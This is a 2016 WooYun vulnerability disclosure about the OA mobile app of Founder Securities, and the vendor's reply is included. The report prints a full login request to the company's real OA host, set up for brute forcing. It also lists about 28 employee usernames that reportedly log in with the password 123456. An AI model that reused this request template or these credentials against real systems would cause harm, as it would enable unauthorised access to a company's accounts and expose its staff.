当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190850

漏洞标题:方正证券股份有限公司OA系统弱口令一打

相关厂商:方正证券股份有限公司

漏洞作者: 韶之恋

提交时间:2016-03-30 20:11

修复时间:2016-05-14 20:30

公开时间:2016-05-14 20:30

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

详细说明:

AppStore下载方正证券OA App,登陆接口可以爆破
问题数据包:

POST /FzoaRequestHelp/rootAction.do HTTP/1.1
Host: nmoa.foundersc.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 440
Accept-Language: zh-cn
Accept: */*
Connection: keep-alive
User-Agent: FZOA1/7.0.8 CFNetwork/758.3.15 Darwin/15.4.0
<?xml version='1.0' encoding='utf-8' ?><request><action id="login"><param key="hasencrypt">true</param><param key='username' >§wangwei§</param><param key="password">%40S%4054%40E%40%40S%4055%40E%40%40S%4056%40E%40%40S%4057%40E%40%40S%4058%40E%40%40S%4059%40E%40</param><param key='model'>iPhone</param><param key='systemVersion'>9.3</param><param key='uniqueIdentifier'>020000000000</param><param key='token'>(null)</param></action></request>


弱口令:123456(以下均可登陆)
451 yangxiuzhen 200 false false 1233
274 wanghaiyan 200 false false 1232
220 lijianhua 200 false false 1231
226 zhangshuai 200 false false 1229
187 zhangting 200 false false 1228
472 zhangrong 200 false false 1228
197 zhanglin 200 false false 1227
208 zhangxue 200 false false 1227
225 wangqian 200 false false 1227
240 liuchang 200 false false 1227
321 wangdong 200 false false 1227
440 zhanglin 200 false false 1227
94 wangxin 200 false false 1226
101 wangbin 200 false false 1226
150 yangjie 200 false false 1226
157 wanghua 200 false false 1226
265 chenhua 200 false false 1226
281 chenlei 200 false false 1226
285 wangrui 200 false false 1226
411 wangbin 200 false false 1226
429 yangxue 200 false false 1226
436 wangxin 200 false false 1226
37 liyong 200 false false 1225
39 liujie 200 false false 1225
65 liutao 200 false false 1225
207 wangxu 200 false false 1225
315 liukai 200 false false 1225
318 liuhua 200 false false 1225

漏洞证明:

IMG_1479.PNG

IMG_1480.PNG

IMG_1481.PNG

修复方案:

加强员工安全意识,企业内用App不要上架

版权声明:转载请注明来源 韶之恋@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2016-03-30 20:27

厂商回复:

我公司已知悉此漏洞,因系统结构太老无法修补。新系统即将上线。内部已发相关通告

最新状态:

暂无